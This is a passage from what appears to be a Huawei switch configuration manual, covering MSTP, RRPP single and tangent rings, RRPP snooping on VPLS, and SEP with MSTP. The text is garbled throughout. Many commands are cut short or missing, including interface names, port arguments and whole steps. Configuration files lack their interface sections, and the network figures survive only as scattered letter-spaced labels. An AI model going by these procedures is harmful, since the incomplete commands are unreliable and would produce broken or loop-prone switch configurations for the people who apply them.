Auth type : NONE
Virtual MAC : 0000-5e00-0102
Check TTL : YES
Create time : 2012-05-11 11:40:18
Last change time : 2012-05-26 11:48:58
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 2 to 4
#
#
region-name RG1
instance 1 vlan 2
instance 2 vlan 3
#
interface Vlanif2
ip address 10.1.2.102 255.255.255.0
#
interface Vlanif3
ip address 10.1.3.102 255.255.255.0
#
interface Vlanif4
ip address 10.1.4.102 255.255.255.0
#
stp root-protection
#


#
#
ospf 1
area 0.0.0.0
network 10.1.2.0 0.0.0.255
network 10.1.3.0 0.0.0.255
network 10.1.4.0 0.0.0.255
#
return
#
sysname SwitchB
#
vlan batch 2 to 3 5
#
#
region-name RG1
instance 1 vlan 2
instance 2 vlan 3
#
interface Vlanif2
ip address 10.1.2.103 255.255.255.0
#
interface Vlanif3
ip address 10.1.3.103 255.255.255.0
#
interface Vlanif5
ip address 10.1.5.103 255.255.255.0
#
stp root-protection
#
#
#
ospf 1
area 0.0.0.0
network 10.1.2.0 0.0.0.255
network 10.1.3.0 0.0.0.255
network 10.1.5.0 0.0.0.255
#
return

#
sysname SwitchC
#
vlan batch 2 to 3
#
#
region-name RG1
instance 1 vlan 2
instance 2 vlan 3
#
#
port default vlan 2
#
port default vlan 3
#
#
return
7.5 Example for Configuring a Single RRPP Ring with a

Single Instance
RRPP Overview
In most situations, the ring network topology is applied to MANs and enterprise networks to
improve network reliability. When a fault occurs on a node or on a link between nodes, data
services are switched to the standby link to ensure nonstop services. However, broadcast
storms may occur on a ring network.
Many protocols can prevent broadcast storms on ring networks. However, if a fault occurs on
a ring network, it takes some time for the devices to switch data services to the standby link.
If the convergence takes too much time, services are interrupted.
To shorten the convergence time and eliminate the impact of network scale on convergence
time, Huawei developed the Rapid Ring Protection Protocol (RRPP). Compared with other
Ethernet ring technologies, RRPP has the following advantages:
l RRPP applies to networks composed of many network nodes because the convergence
time is not affected by the number of nodes on the ring network.
l RRPP prevents broadcast storms caused by data loops when an Ethernet ring is
complete.
l When a link on an Ethernet ring network fails, the standby link can rapidly restore the
communication among the Ethernet ring network nodes.

Configuration Notes
l STP and Smart Link must be disabled on the interface added to an RRPP domain.
l DHCP and MAC address limiting rules cannot be configured in an RRPP control VLAN.
l When the mapping between the protected instance and MUX VLAN needs to be
configured, you are advised to configure the principal VLAN, subordinate group VLAN,
and subordinate separate VLAN in the MUX VLAN in the protected instance.
Otherwise, loops may occur.
As shown in Figure 7-5, SwitchA, SwitchB, and SwitchC constitute a ring network. The
network is required to prevent loops when the ring is complete and to implement fast
convergence to rapidly restore communication between nodes in the ring when the ring fails.
You can enable RRPP on SwitchA, SwitchB, and SwitchC to meet this requirement.
Figure 7-5 Networking of a single RRPP ring

S w itc h B
G E 2 /0 /2
G E 2 /0 /1 G E 2 /0 /1
R in g 1
G E 2 /0 /2 G E 2 /0 /2 S w itc h C
G E 2 /0 /1
S w itc h A
P r im a r y in te r fa c e
S e c o n d a r y in te r fa c e
1. Create an RRPP domain and its control VLAN.

2. Map VLANs from which data needs to pass through in the RRPP ring to instance 1,
including data VLANs 100 to 300 and control VLANs 20 and 21 (VLAN 21 is the sub-
control VLAN generated by the device).
3. Configure interfaces to be added to the RRPP domain on the devices so that data can
pass through the interfaces. Disable protocols that conflict with RRPP, such as STP.
4. In the RRPP domain, configure a protected VLAN, create an RRPP ring and configure
SwitchA, SwitchB, and SwitchC as nodes in ring 1 in domain 1. Configure SwitchA as
the master node in ring 1 and configure SwitchB and SwitchC as transit nodes in ring 1.
5. Enable the RRPP ring and RRPP on devices.
Procedure
Step 1 Create an RRPP domain and its control VLAN.
# Configure SwitchA. The configurations of SwitchB and SwitchC are similar to the

[SwitchA] rrpp domain 1
[SwitchA-rrpp-domain-region1] control-vlan 20 //Each RRPP domain has a major
control VLAN and a sub-control VLAN. You only need to specify the major control
VLAN. The system uses the VLAN whose ID is one greater than the ID of the major
control VLAN as the sub-control VLAN.
[SwitchA-rrpp-domain-region1] quit
Step 2 Map instance 1 to control VLANs 20 and 21 and data VLANs 100 to 300.
[SwitchA-mst-region] instance 1 vlan 20 21 100 to 300 //Add the major control
VLAN, sub-control VLAN, and data VLANs to instance 1.
[SwitchA-mst-region] active region-configuration
Step 3 Configure the interfaces to be added to the RRPP ring as trunk interfaces, configure the
interfaces to allow VLANs 100 to 300 to pass through, and disable STP on the interfaces.
[SwitchA-GigabitEthernet2/0/1] stp disable
Step 4 Specify a protected VLAN, and create and enable an RRPP ring.
# Configure SwitchA.
[SwitchA-rrpp-domain-region1] protected-vlan reference-instance 1 //Configure
instance 1 as the protected instance of the RRPP domain.
[SwitchA-rrpp-domain-region1] ring 1 node-mode master primary-port
gigabitethernet 2/0/1 secondary-port gigabitethernet 2/0/2 level 0
[SwitchA-rrpp-domain-region1] ring 1 enable
# Configure SwitchB.
[SwitchB] rrpp domain 1
[SwitchB-rrpp-domain-region1] protected-vlan reference-instance 1
[SwitchB-rrpp-domain-region1] ring 1 node-mode transit primary-port
[SwitchB-rrpp-domain-region1] ring 1 enable
[SwitchB-rrpp-domain-region1] quit
# Configure SwitchC.
[SwitchC] rrpp domain 1
[SwitchC-rrpp-domain-region1] protected-vlan reference-instance 1
[SwitchC-rrpp-domain-region1] ring 1 node-mode transit primary-port
[SwitchC-rrpp-domain-region1] ring 1 enable
[SwitchC-rrpp-domain-region1] quit

Step 5 Enable RRPP.

[SwitchA] rrpp enable

following operations to verify the configuration. The display on SwitchA is used as an
example.
# Run the display rrpp brief command on SwitchA. The following information is displayed:
[SwitchA] display rrpp brief
Abbreviations for Switch Node Mode :
M - Master , T - Transit , E - Edge , A - Assistant-Edge
RRPP Protocol Status: Enable

RRPP Working Mode: HW
RRPP Linkup Delay Timer: 0 sec (0 sec default)
Number of RRPP Domains: 1
Domain Index : 1
Control VLAN : major 20 sub 21
Protected VLAN : Reference Instance 1
Hello Timer : 1 sec(default is 1 sec) Fail Timer : 6 sec(default is 6 sec)
Ring Ring Node Primary/Common Secondary/Edge Is

ID Level Mode Port Port Enabled
----------------------------------------------------------------------------
1 0 M GigabitEthernet2/0/1 GigabitEthernet2/0/2 Yes
According to the preceding information, RRPP is enabled on SwitchA; the major control
VLAN of RRPP domain 1 is VLAN 20 and the sub-control VLAN is VLAN 21; SwitchA is
the master node in ring 1; the primary interface is GigabitEthernet2/0/1 and the secondary
interface is GigabitEthernet2/0/2.
# Run the display rrpp verbose domain command on SwitchA. The following information is
displayed:
[SwitchA] display rrpp verbose domain 1
Domain Index : 1
RRPP Ring : 1
Ring Level : 0
Node Mode : Master
Ring State : Complete
Is Enabled : Enable Is Active: Yes
Primary port : GigabitEthernet2/0/1 Port status: UP
Secondary port : GigabitEthernet2/0/2 Port status: BLOCKED
The command output shows that the RRPP ring is complete.
----End
Configuration Files
#
sysname SwitchA

#
#
rrpp enable
#
instance 1 vlan 20 to 21 100 to 300
#
rrpp domain 1
control-vlan 20
protected-vlan reference-instance 1
ring 1 node-mode master primary-port GigabitEthernet2/0/1 secondary-port
GigabitEthernet2/0/2 level 0
ring 1 enable
#
stp disable
#
stp disable
#
return
#
sysname SwitchB
#
#
rrpp enable
#
#
rrpp domain 1
control-vlan 20
ring 1 node-mode transit primary-port GigabitEthernet2/0/1 secondary-port
ring 1 enable
#
stp disable
#
stp disable
#
return
#
sysname SwitchC
#
#
rrpp enable

#
#
rrpp domain 1
control-vlan 20
ring 1 enable
#
stp disable
#
stp disable
#
return
Relevant Information
Video
Configure RRPP
7.6 Example for Configuring Tangent RRPP Rings

Tangent RRPP Ring
Generally, a metro Ethernet network uses two-layer rings:
l One layer is the aggregation layer between aggregation devices PE-AGGs, for example,
RRPP domain 1 in Figure 7-6.
l The other layer is the access layer between PE-AGGs and UPEs, for example, RRPP
domain 2 and RRPP domain 3 in Figure 7-6.
As shown in Figure 7-6, intersecting RRPP rings can be used. RRPP rings are configured at
aggregation and access layers, and the two layers are connected through tangent RRPP rings.

Figure 7-6 Tangent RRPP rings

M a ste r
UPE1
UPE2 P E -A G G 3
RRPP T ra n sit 1
D o m a in 2
M a ste r
P E -A G G 1
UPE RRPP P IP /M P L S
D o m a in 1 C o re
UPE S
UPE B lo ck NPE
RRPP T ra n sit 2
D o m a in 3
P E -A G G 2
M a s te r P E -A G G ： P E -A g g re g a tio n
UPE N P E ： N e tw o rk P ro vid e r E d g e
U M G ： U n ive rsa l M e d ia G a te w a y
U P E ： U n d e rla ye r P ro vid e r E d g e
D S L A M ： D ig ita l S u b scrib e r L in e A cce ss M u ltip le xe r
L A N S w itch CE DSLAM UMG
Two tangent rings cannot belong to the same RRPP domain. The tangent point of the two
tangent rings belongs to two RRPP domains, and the major node can be located in the tangent
point.
When there are multiple tangent RRPP rings, a fault of a ring does not affect other domains
and the convergence process of RRPP rings in a domain is the same as that of a single ring.
Configuration Notes
l STP and Smart Link must be disabled on the interface added to an RRPP domain.
l DHCP and MAC address limiting rules cannot be configured in an RRPP control VLAN.
l When the mapping between the protected instance and MUX VLAN needs to be
configured, you are advised to configure the principal VLAN, subordinate group VLAN,
and subordinate separate VLAN in the MUX VLAN in the protected instance.
Otherwise, loops may occur.
As shown in Figure 7-6, the network is required to prevent loops when the ring is complete
and to implement fast convergence to rapidly restore communication between nodes in the
ring when the ring fails. RRPP can meet this requirement. RRPP supports multiple rings. You
can configure RRPP rings at the aggregation and access layers. The two rings are tangent,
simplifying the network configuration.
SwitchE, SwitchD, SwitchC, SwitchA, and SwitchB in Figure 7-7 map PE-AGG1, PE-
AGG2, PE-AGG3, UPE1, and UPE2 in Figure 7-6 respectively. Figure 7-7 is used as an
example to describe how to configure tangent RRPP rings with a single instance.

Figure 7-7 Networking of tangent RRPP rings
D o m a in 2 D o m a in 1
S w tic h A G E 2 /0 /2 G E 1 /0 /1 S w tic h E
G E 2 /0 /1 G E 2 /0 /1 G E 1 /0 /2 G E 1 /0 /2
R in g 2 S w tic h C R in g 1
G E 2 /0 /2 G E 1 /0 /1
G E 2 /0 /2 G E 1 /0 /1
S w tic h B
G E 2 /0 /1 G E 1 /0 /2 S w tic h D
1. Create RRPP domains and control VLANs for configuring RRPP rings.
2. Map the VLANs that need to pass through ring 1 to instance 1, including data VLANs
and control VLANs, which are used for configuring protected VLANs.
Map the VLANs that need to pass through ring 2 to instance 2, including data VLANs
and control VLANs, which are used for configuring protected VLANs.
3. Configure interfaces to be added to the RRPP domain on the devices so that data can
pass through the interfaces. Disable protocols that conflict with RRPP, such as STP.
4. Configure protected VLANs and create RRPP rings in RRPP domains.
a. Configure SwitchA, SwitchB, and SwitchC to be in ring 2 of RRPP domain 2.
b. Configure SwitchC, SwitchD, and SwitchE to be in ring 1 of RRPP domain 1.
c. Configure SwitchA as the master node in ring 2, and configure SwitchB and
SwitchC as transit nodes in ring 2.
d. Configure SwitchE as the master node in ring 1, and configure SwitchC and
SwitchD as transit nodes in ring 1.
5. Enable the RRPP ring and RRPP on devices.
Procedure
Step 1 Configure instance 2 and map it to the data VLANs and control VLANs allowed by the RRPP
interface.
# Configure SwitchA. The configurations of SwitchB, SwitchC, SwitchD, and SwitchE are
similar to the configuration of SwitchA, and are not mentioned here. For details, see the
[SwitchA-mst-region] instance 2 vlan 20 to 21 ///Add the major control VLAN and
sub-control VLAN to instance 1.
Step 2 Create RRPP domains and configure control VLANs and protected VLANs of the RRPP
domains.

# Configure SwitchE. The configurations of SwitchA, SwitchB, SwitchC, and SwitchD are
similar to the configuration of SwitchE, and are not mentioned here. For details, see the
[SwitchE] rrpp domain 1
[SwitchE-rrpp-domain-region1] control-vlan 10 //Each RRPP domain has a major
control VLAN and a sub-control VLAN. You only need to specify the major control
VLAN. The system uses the VLAN whose ID is one greater than the ID of the major
control VLAN as the sub-control VLAN.
[SwitchE-rrpp-domain-region1] protected-vlan reference-instance 1 //Configure
[SwitchE-rrpp-domain-region1] quit
Step 3 Configure the interfaces to be added to RRPP rings as trunk interfaces and disable STP on the
interfaces.
Step 4 Create and enable the RRPP ring.

l Configure nodes in ring 2.
# Configure SwitchA as the master node in ring 2 and specify the primary and secondary
interfaces.
# Configure SwitchB as a transit node in ring 2 (major ring) and specify the primary and
secondary interfaces.
# Configure SwitchC as a transit node in ring 2 and specify the primary and secondary
interfaces.
l Configure nodes in ring 1.

# Configure SwitchE as the master node in ring 1 (major ring) and specify the primary
and secondary interfaces.
[SwitchE] rrpp domain 1
[SwitchE-rrpp-domain-region1] ring 1 node-mode master primary-port

[SwitchE-rrpp-domain-region1] ring 1 enable

[SwitchE-rrpp-domain-region1] quit
# Configure SwitchC as a transit node in ring 1 and specify the primary and secondary
interfaces.
# Configure SwitchD as a transit node in ring 1 and specify the primary and secondary
interfaces.
[SwitchD] rrpp domain 1
[SwitchD-rrpp-domain-region1] ring 1 node-mode transit primary-port
[SwitchD-rrpp-domain-region1] ring 1 enable
[SwitchD-rrpp-domain-region1] quit
Step 5 Enable RRPP.


following operations to verify the configuration. The tangent point SwitchC is used as an
example.
# Run the display rrpp brief command on SwitchC. The following information is displayed:
[SwitchC] display rrpp brief

Domain Index : 1
----------------------------------------------------------------------------
1 0 T GigabitEthernet1/0/1 GigabitEthernet1/0/2 Yes
Domain Index : 2
----------------------------------------------------------------------------
2 0 T GigabitEthernet2/0/1 GigabitEthernet2/0/2 Yes
According to the preceding information, RRPP is enabled on SwitchC; the major control
VLAN of RRPP domain 1 is VLAN 10 and the sub-control VLAN is VLAN 11; SwitchC is a
transit node in ring 1; the primary interface is GigabitEthernet1/0/1 and the secondary
interface is GigabitEthernet1/0/2.

The major control VLAN of SwitchC in RRPP domain 2 is VLAN 20 and the sub-control
VLAN is VLAN 21; SwitchC is a transit node in ring 2; the primary interface is
GigabitEthernet2/0/1 and the secondary interface is GigabitEthernet2/0/2.
On SwitchC, run the display rrpp verbose domain command. The following information is
displayed.
# Check detailed information about RRPP domain 1 on SwitchC.
[SwitchC] display rrpp verbose domain 1
Domain Index : 1
RRPP Ring : 1
Ring Level : 0
Node Mode : Transit
Ring State : LinkUp
Secondary port : GigabitEthernet1/0/2 Port status: UP
# Check detailed information about RRPP domain 2 on SwitchC.

[SwitchC] display rrpp verbose domain 2
Domain Index : 2
RRPP Ring : 2
Ring Level : 0
Node Mode : Transit
Ring State : LinkUp
Secondary port : GigabitEthernet2/0/2 Port status: UP
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 20 to 21
#
rrpp enable
#
#
rrpp domain 2
control-vlan 20
ring 2 enable
#
stp disable

#
stp disable
#
return
#
sysname SwitchB
#
vlan batch 20 to 21
#
rrpp enable
#
#
rrpp domain 2
control-vlan 20
ring 2 enable
#
stp disable
#
stp disable
#
return
#
sysname SwitchC
#
#
rrpp enable
#
#
rrpp domain 1
control-vlan 10
ring 1 enable
rrpp domain 2
control-vlan 20
ring 2 enable
#


stp disable
#
stp disable
#
stp disable
#
stp disable
#
return
#
sysname SwitchD
#
vlan batch 10 to 11
#
rrpp enable
#
#
rrpp domain 1
control-vlan 10
ring 1 enable
#
stp disable
#
stp disable
#
return
l Configuration file of SwitchE
#
sysname SwitchE
#
vlan batch 10 to 11
#
rrpp enable
#
#
rrpp domain 1

control-vlan 10
ring 1 enable
#
stp disable
#
stp disable
#
return
Video
Configure RRPP
7.7 Example for Configuring RRPP Snooping on a VPLS

Network
RRPP Snooping Overview
RRPP snooping notifies a VPLS network of changes in an RRPP ring. After RRPP snooping
is enabled on sub-interfaces or VLANIF interfaces, the VPLS network can transparently
transmit RRPP packets, detect changes in the RRPP ring, and update forwarding entries,
ensuring that traffic can be rapidly switched to a non-blocking path.
As shown in Figure 7-8, UPEs constitute an RRPP ring and connect to the VPLS network
where NPEs are located. NPEs are connected through a PW, so they cannot serve as RRPP
nodes to respond to RRPP packets. As a result, the VPLS network cannot detect the RRPP
ring status change. When the RRPP ring topology changes, each node on the VPLS network
forwards downstream data according to the MAC address table generated before the RRPP
ring topology changes. Consequently, the downstream traffic cannot be forwarded.

Figure 7-8 Networking for Configuring RRPP snooping on a VPLS network

NPEB
VPLS
NPEA NPEC
NPED
R R P P rin g
P
UPEA UPEB
S
d a ta p a c k e t
h e llo p a c k e t
P p rim a ry in te rfa c e
S s e c o n d a ry in te rfa c e
You can enable RRPP snooping on the sub-interface or VLANIF interface of NPED and
associate the interface with VSIs on the local device. When the RRPP ring is faulty, NPED on
the VPLS network deletes forwarding entries of VSIs (including the associated VSIs) on the
local node and forwarding entries of NPEB to re-learn forwarding entries. This ensures that
traffic can be switched to a normal path and downstream traffic can be properly forwarded.
Configuration Notes
l RRPP and RRPP snooping cannot be configured on the same interface.
l SA series cards and XGE interfaces connected to ET1D2IPS0S00, ET1D2FW00S00,
ET1D2FW00S01, ET1D2FW00S02, and ACU2 cards do not support RRPP snooping. In
earlier versions of V200R007C00, X1E series cards do not support RRPP snooping.
As shown in Figure 7-9, SwitchA, SwitchB, SwitchC, and SwitchD constitute an RRPP ring.
The network is required to prevent loops when the ring is complete and to implement fast
convergence to rapidly restore communication between nodes in the ring when the ring fails.
The VPLS network is able to transparently transmit RRPP packets, detect RRPP ring status
change, and update forwarding entries so that traffic can be rapidly switched to a normal path
according to the ring status.

Figure 7-9 Networking of RRPP snooping

S w itc h
VPLS
S w itc h C S w itc h D
G E 2 /0 /0 .1 0 b in d in g V S I 1 0 G E 2 /0 /0 .1 0 b in d in g V S I 1 0
G E 2 /0 /0 .2 0 b in d in g V S I 2 0 G E 2 /0 /0 .2 0 b in d in g V S I 2 0
R R P P r in g
R in g 1
G E 1 /0 /2 C o n tr o l V L A N 2 0 G E 1 /0 /2
S w itc h A S w itc h B
G E 1 /0 /1 G E 1 /0 /1
1. Configure a VPLS network.
2. Configure an RRPP ring to prevent loops and implement fast convergence when a device
fails.
3. Enable RRPP snooping so that the VPLS network can transparently transmit RRPP
packets and detect RRPP ring status change.
4. Associate interfaces with VSIs so that SwitchC and SwitchD on the VPLS network can
delete the MAC address tables of their VSIs when a fault occurs on the RRPP ring
network.
NOTE
VLAN termination sub-interfaces can be created on a non-VCMP client.
Procedure
Step 1 Configure VPLS. SwitchC is used as an example. The configuration of SwitchD is similar to
the configuration of SwitchC, and is not mentioned here. For details, see the configuration
files.
NOTE
This example provides only configurations of sub-interfaces on SwitchC and SwitchD connected to the
RRPP ring. The configurations of devices on the VPLS network are not mentioned.
# Configure GE2/0/0.10 on SwitchC to allow the packets of VLAN 10 to pass through and
bind GE2/0/0.10 to VSI 10.
[SwitchC-GigabitEthernet2/0/0] undo portswitch
[SwitchC] interface gigabitethernet 2/0/0.10
[SwitchC-GigabitEthernet2/0/0.10] dot1q termination vid 10
[SwitchC-GigabitEthernet2/0/0.10] l2 binding vsi VSI10 //Bind a VSI to the sub-
interface.
[SwitchC-GigabitEthernet2/0/0.10] quit
# Configure GE2/0/0.20 on SwitchC to allow packets of VLAN 20 (control VLAN of RRPP)

to pass through and bind GE2/0/0.20 to VSI 20.
[SwitchC-GigabitEthernet2/0/0.20] dot1q termination vid 20

[SwitchC-GigabitEthernet2/0/0.20] l2 binding vsi VSI20

Step 2 Create an RRPP domain and its control VLAN.

# Create VLAN 10 on SwitchA.
[SwitchA-mst-region] instance 1 vlan 10 20 21 //Add the major control VLAN, sub-
control VLAN, and data VLAN to instance 1.
# Configure SwitchA (master node in ring 1) in RRPP domain 1 and VLAN 20 as the control
VLAN.
[SwitchA-rrpp-domain-region1] protected-vlan reference-instance 1 //Configure
[SwitchA-rrpp-domain-region1] control-vlan 20 //Each RRPP
domain has a major control VLAN and a sub-control VLAN. You only need to specify
the major control VLAN. The system uses the VLAN whose ID is one greater than the
ID of the major control VLAN as the sub-control VLAN.
# Create VLAN 10 on SwitchB.

[SwitchB] vlan batch 10
[SwitchB] stp region-configuration
[SwitchB-mst-region] instance 1 vlan 10 20 21
[SwitchB-mst-region] active region-configuration
# Configure SwitchB (transit node in ring 1) in RRPP domain 1 and VLAN 20 as the control
VLAN.
[SwitchB-rrpp-domain-region1] protected-vlan reference-instance 1
[SwitchB-rrpp-domain-region1] control-vlan 20
Step 3 Disable STP on the interfaces to be added to the RRPP ring.

# Disable STP on the interfaces to be added to the RRPP ring on SwitchA.
# Disable STP on the interfaces to be added to the RRPP ring on SwitchB.

[SwitchB-GigabitEthernet1/0/1] stp disable


[SwitchB-GigabitEthernet1/0/2] stp disable
Step 4 Create an RRPP ring.

# Configure SwitchA as the master node in ring 1 and specify the primary and secondary
interfaces.
# Configure SwitchB as a transit node in ring 1 (major ring) and specify the primary and
secondary interfaces.
Step 5 Enable RRPP.

# Enable RRPP on SwitchA.
# Enable RRPP on SwitchB.

[SwitchB] rrpp enable
Step 6 Configure RRPP snooping.

# Enable RRPP snooping on GE2/0/0.20 of SwitchC.
[SwitchC-GigabitEthernet2/0/0.20] rrpp snooping enable
# Enable RRPP snooping on GE2/0/0.20 of SwitchD.

[SwitchD] interface gigabitethernet 2/0/0.20
[SwitchD-GigabitEthernet2/0/0.20] rrpp snooping enable
Step 7 Configure association between interfaces and VSIs.

# Associate VSI 10 with GE2/0/0.20 on SwitchC.
[SwitchC-GigabitEthernet2/0/0.20] rrpp snooping vsi VSI10
# Associate VSI 10 with GE2/0/0.20 on SwitchD.

[SwitchD-GigabitEthernet2/0/0.20] rrpp snooping vsi VSI10
[SwitchD-GigabitEthernet2/0/0.20] quit

following operations to verify the configuration. SwitchA is used as an example.
l Run the display rrpp brief command on SwitchA. The following information is
displayed:
[SwitchA] display rrpp brief


Domain Index : 1

----------------------------------------------------------------------------
According to the preceding information, RRPP is enabled on SwitchA; the major control
VLAN of RRPP domain 1 is VLAN 20 and the sub-control VLAN is VLAN 21;
SwitchA is the master node in ring 1; the primary interface is GE1/0/1 and the secondary
interface is GE1/0/2.
l Run the display rrpp verbose domain command on SwitchA. The following
information is displayed.
# Check detailed information about RRPP domain 1 on SwitchA.
[SwitchA] display rrpp verbose domain 1
Domain Index : 1
Hello Timer : 1 sec(default is 1 sec) Fail Timer : 6 sec(default is 6
sec)
RRPP Ring : 1
Ring Level : 0
Node Mode : Master
Is Enabled : Enable Is Active : Yes
# Check the RRPP snooping configuration on GE2/0/0.20 of SwitchC.

[SwitchC] display rrpp snooping enable interface gigabitethernet 2/0/0.20
Port VsiName Vlan
---------------------------------------------------------------------------
GigabitEthernet2/0/0.20 VSI20 20
You can see that VSI 20 and VLAN 20 are associated with GE2/0/0.20.
# Check information about other VSIs associated with GE2/0/0.20 on SwitchC.
[SwitchC] display rrpp snooping vsi interface gigabitethernet 2/0/0.20
Port VsiName
---------------------------------------------------------------------
GigabitEthernet2/0/0.20 VSI10
GigabitEthernet2/0/0.20 VSI20
You can see that GE2/0/0.20 is associated with VSI 10 and VSI 20.
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 10 20 to 21
#

rrpp enable
#
instance 1 vlan 10 20 to 21
#
rrpp domain 1
control-vlan 20
ring 1 enable
#
port trunk allow-pass vlan 10 20 to 21
stp disable
#
stp disable
#
return
#
sysname SwitchB
#
#
rrpp enable
#
instance 1 vlan 10 20 to 21
#
rrpp domain 1
control-vlan 20
ring 1 enable
#
stp disable
#
stp disable
#
return
#
sysname SwitchC
#
undo portswitch
#
l2 binding vsi VSI10
#

rrpp snooping enable

rrpp snooping vsi VSI10
#
return

#
sysname SwitchD
#
undo portswitch
#
#
rrpp snooping enable
rrpp snooping vsi VSI10
#
return
Video
Configure RRPP
7.8 Example for Configuring SEP and MSTP on a Network

Overview
Generally, redundant links are used to provide link backup and enhance network reliability.
The use of redundant links, however, may produce loops. Loops cause infinite looping of
packets. Consequently, broadcast storms occur and the MAC address table becomes unstable.
As a result, the communication quality deteriorates, and communication services may even be
interrupted. To block redundant links and ensure that the blocked links can be restored
immediately to resume communication when a link fault occurs on a ring network, you can
deploy SEP and MSTP on the ring network.
Configuration Notes
This example applies to all versions and products.
Multiple Layer 2 access devices need to be added due to service development of company A.
As shown in Figure 7-10, multiple Layer 2 switching devices form a ring at the access layer,
and multiple Layer 3 devices form a ring at the aggregation layer. The aggregation layer uses
MSTP to eliminate redundant links. Company A requires that services be rapidly switched to
prevent traffic interruption when a link at the access layer fails.
You can deploy multiple Layer 2 devices in a ring and configure SEP to meet the following
requirements of company A:
l When there is no faulty link on the ring network, SEP can eliminate loops.

l When a link fails on the ring network, SEP can fast restore communication between
nodes in the ring.
l The topology change notification function is configured on an edge device in a SEP
segment so that devices on the upper-layer network can detect topology changes on the
lower-layer network in a timely manner. After receiving a topology change notification
from a lower-layer network, a device on an upper-layer network sends a TC packet to
instruct other devices to delete original MAC addresses and learn new MAC addresses.
This ensures nonstop traffic forwarding.
Figure 7-10 SEP and MSTP networking
G E 1 /0 /2
G E 1 /0 /3 G E 1 /0 /3
Aggregation
G E 1 /0 /2 PE4
PE3
G E 1 /0 /1
G E 1 /0 /1
M STP
G E 1 /0 /2 PE1 PE2 G E 1 /0 /2
G E 1 /0 /3
G E 1 /0 /1 D o n o t S u p p o rt S E P G E 1 /0 /1
G E 1 /0 /1 G E 1 /0 /1
SEP
LSW 1 S e g m e n t1 LSW 2
G E 1 /0 /2 G E 1 /0 /2
G E 1 /0 /2 G E 1 /0 /1
Access
G E 1 /0 /3 S W 3
L
G E 1 /0 /1
CE
N o -n e ig h b o r P rim a ry E d g e P o rt
N o -n e ig h b o r S e co n d a ry E d g e P o rt
VLAN 100 B lo ck P o rt(S E P )
B lo ck P o rt(M S T P )
1. Configure basic SEP functions.
a. Configure SEP segment 1 on LSW1 to LSW3 and configure VLAN 10 as the
control VLAN of SEP segment 1.
b. Add LSW1 to LSW3 to SEP segment 1 and configure interface roles on edge
devices (LSW1 and LSW2) of the SEP segment.
NOTE
PE1 and PE2 do not support the SEP protocol; therefore, the interfaces of LSW1 and LSW2
connected to the PEs must be no-neighbor edge interfaces.
c. On the device where the no-neighbor primary edge interface is located, specify the
interface in the middle of the SEP segment as the interface to block.

d. Configure manual preemption.

e. Configure the topology change notification function so that the upper-layer network
running MSTP can be notified of topology changes in the SEP segment.
2. Configure basic MSTP functions.
a. Add PE1 to PE4, LSW1, and LSW2 to the MST region RG1.
b. Create VLANs on PE1 to PE4, LSW1, and LSW2 and add interfaces on the STP
ring to the VLANs.
c. Configure PE3 as the root bridge and PE4 as the secondary root bridge.
3. Configure Layer 2 forwarding on the CE and LSW1 to LSW3.
NOTE
PE1 and PE2 are aggregation switches, PE3 is the root bridge, PE4 is the secondary root bridge, LSWs are
access switches, and CEs are user-side switches.
Procedure
Step 1 Configure basic SEP functions.
1. Configure SEP segment 1 on LSW1 to LSW3 and configure VLAN 10 as the control
VLAN of SEP segment 1.
# Configure LSW1.
[HUAWEI] sysname LSW1
[LSW1] sep segment 1 //Create SEP segment 1.
[LSW1-sep-segment1] control-vlan 10 //Configure VLAN 10 as the control VLAN
of SEP segment 1.
[LSW1-sep-segment1] protected-instance all //Configure all protected
instances of SEP segment 1.
[LSW1-sep-segment1] quit
# Configure LSW2.
of SEP segment 1.
# Configure LSW3.
of SEP segment 1.
NOTE
– The control VLAN must be a VLAN that has not been created or used, but the command for
creating a common VLAN is automatically displayed in the configuration file after the control
VLAN is created.
– Each SEP segment must have a control VLAN. After an interface is added to an SEP segment that
has a control VLAN, the interface is automatically added to the control VLAN.
2. Add LSW1 to LSW3 to SEP segment 1 and configure interface roles.

NOTE
By default, STP is enabled on Layer 2 interfaces. Before adding an interface to an SEP segment, disable
STP on the interface.
# Configure LSW1.
[LSW1] interface gigabitethernet 1/0/1
[LSW1-GigabitEthernet1/0/1] port link-type hybrid
[LSW1-GigabitEthernet1/0/1] sep segment 1 edge no-neighbor primary //
Configure the interface as the no-neighbor primary edge interface and add it
to SEP segment 1.
[LSW1-GigabitEthernet1/0/1] quit
[LSW1-GigabitEthernet1/0/2] stp disable //Disable STP.
[LSW1-GigabitEthernet1/0/2] sep segment 1 //Add the interface to SEP segment
1.
# Configure LSW2.
[LSW2-GigabitEthernet1/0/1] sep segment 1 edge no-neighbor secondary //
Configure the interface as the no-neighbor secondary edge interface and add
it to SEP segment 1.
1.
# Configure LSW3.
1.
1.
3. Specify a blocking interface.

# In SEP segment 1, set the mode of blocking an interface on LSW1 where the no-
neighbor primary edge interface is located to block the interface in the middle of the SEP
segment.
[LSW1] sep segment 1
[LSW1-sep-segment1] block port middle
4. Configure a preemption mode.

# Configure manual preemption on LSW1.
[LSW1-sep-segment1] preempt manual
5. Configure the SEP topology change notification function.

Configure devices in SEP segment 1 to notify the MSTP network of topology changes.
# Configure LSW1.
[LSW1-sep-segment1] tc-notify stp
# Configure LSW2.

[LSW2] sep segment 1

[LSW2-sep-segment1] tc-notify stp

1. Configure an MST region.
# Configure PE1.
[PE1] stp region-configuration //Enter the MST region view.
[PE1-mst-region] region-name RG1 //Configure the MST region name as RG1.
[PE1-mst-region] active region-configuration //Activate MST region
configuration.
[PE1-mst-region] quit
# Configure PE2.
configuration.
# Configure PE3.
configuration.
# Configure PE4.
configuration.
# Configure LSW1.
[LSW1] stp region-configuration //Enter the MST region view.
[LSW1-mst-region] region-name RG1 //Configure the MST region name as RG1.
[LSW1-mst-region] active region-configuration //Activate MST region
configuration.
[LSW1-mst-region] quit
# Configure LSW2.
[LSW2] stp region-configuration //Enter the MST region view.
[LSW2-mst-region] region-name RG1 //Configure the MST region name as RG1.
[LSW2-mst-region] active region-configuration //Activate MST region
configuration.
[LSW2-mst-region] quit
2. Create a VLAN and add interfaces on the ring network to the VLAN.
# On PE1, create VLAN 100 and add GE1/0/1, GE1/0/2, and GE1/0/3 to VLAN 100.
[PE1] vlan 100
[PE1-vlan100] quit
[PE1]interface gigabitethernet 1/0/1
[PE1-GigabitEthernet1/0/1] port link-type hybrid
[PE1-GigabitEthernet1/0/1] port hybrid tagged vlan 100


